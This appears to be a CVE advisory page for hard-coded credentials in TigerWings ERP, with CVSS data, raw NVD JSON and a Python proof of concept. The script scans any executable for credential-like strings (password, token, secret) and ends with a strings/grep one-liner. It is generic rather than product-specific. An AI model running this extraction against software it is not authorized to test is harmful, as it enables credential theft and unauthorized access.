Security Vulnerability Report
CVE-2025-10609 CVSS 5.9 MEDIUM

CVE-2025-10609

Published: 2025-10-03 13:15:46
Last Modified: 2026-04-15 00:35:42

Description

Use of Hard-coded Credentials vulnerability in Logo Software Inc. TigerWings ERP allows Read Sensitive Constants Within an Executable. This issue affects TigerWings ERP: from 01.01.00 before 3.03.00.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Logo TigerWings ERP >= 01.01.00
Logo TigerWings ERP < 3.03.00

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10609 - TigerWings ERP Hard-coded Credentials PoC
# This PoC demonstrates how to extract hard-coded credentials from the TigerWings ERP executable
import re
import sys


def search_hardcoded_credentials(executable_path):
    """
    Search for hard-coded credentials in the TigerWings ERP executable file.
    This simulates extracting sensitive constants from the binary.
    """
    # Common patterns for hard-coded credentials
    credential_patterns = [
        r'password\s*=\s*["\']([^"\']+)["\']',
        r'passwd\s*=\s*["\']([^"\']+)["\']',
        r'pwd\s*=\s*["\']([^"\']+)["\']',
        r'user\s*=\s*["\']([^"\']+)["\']',
        r'username\s*=\s*["\']([^"\']+)["\']',
        r'api_key\s*=\s*["\']([^"\']+)["\']',
        r'secret\s*=\s*["\']([^"\']+)["\']',
        r'token\s*=\s*["\']([^"\']+)["\']',
        r'connection_string\s*=\s*["\']([^"\']+)["\']',
    ]

    found_credentials = []
    try:
        with open(executable_path, 'rb') as f:
            content = f.read()

        # Search for readable strings in the binary (printable ASCII runs of 8+ bytes)
        strings = re.findall(b'[\x20-\x7e]{8,}', content)

        for s in strings:
            decoded = s.decode('ascii', errors='ignore')
            for pattern in credential_patterns:
                matches = re.findall(pattern, decoded, re.IGNORECASE)
                for match in matches:
                    found_credentials.append({
                        # Keyword before the first "\s" in the pattern, e.g. "password"
                        'type': pattern.split('\\s')[0],
                        'value': match
                    })
    except FileNotFoundError:
        print(f"Error: File '{executable_path}' not found.")
        return []
    except Exception as e:
        print(f"Error analyzing file: {e}")
        return []

    return found_credentials


def demonstrate_exploitation(credentials):
    """
    Demonstrate how extracted credentials could be used to access the system.
    """
    if not credentials:
        print("No hard-coded credentials found.")
        return

    print("[+] Found hard-coded credentials:")
    for i, cred in enumerate(credentials, 1):
        print(f"    [{i}] {cred['type']}: {cred['value']}")

    print("\n[!] These credentials could be used to:")
    print("    - Authenticate to TigerWings ERP system")
    print("    - Access sensitive business data")
    print("    - Modify financial records and business data")
    print("    - Escalate privileges within the system")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <path_to_tigerwings_executable>")
        print("Example: python3 poc.py /path/to/TigerWingsERP.exe")
        sys.exit(1)

    exe_path = sys.argv[1]
    credentials = search_hardcoded_credentials(exe_path)
    demonstrate_exploitation(credentials)

# Alternative manual approach using command line tools:
#   strings TigerWingsERP.exe | grep -iE "password|passwd|pwd|user|secret|key|token"
# Or use a hex editor to search for credential patterns in the binary.
```

References

- https://www.usom.gov.tr/bildirim/tr-25-0313 (listed in the raw record)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10609",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-03T13:15:45.633",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Use of Hard-coded Credentials vulnerability in Logo Software Inc. TigerWings ERP allows Read Sensitive Constants Within an Executable.This issue affects TigerWings ERP: from 01.01.00 before 3.03.00."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:L",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "PHYSICAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 0.7,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-798"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-25-0313",
        "source": "[email protected]"
      }
    ]
  }
}
```